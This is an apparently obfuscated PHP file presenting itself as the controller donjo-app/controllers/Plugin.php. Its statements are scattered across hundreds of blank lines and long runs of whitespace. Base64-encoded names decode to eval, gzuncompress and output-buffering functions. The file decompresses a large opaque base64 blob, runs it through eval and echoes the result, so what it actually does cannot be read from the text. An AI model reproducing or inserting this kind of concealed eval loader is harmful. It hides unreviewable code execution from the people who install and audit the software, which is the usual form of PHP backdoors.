<?php 
        $__='printf';$_='Loading donjo-app/controllers/Plugin.php';
        



































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































































                                                                                                                                                                                                                     $________;
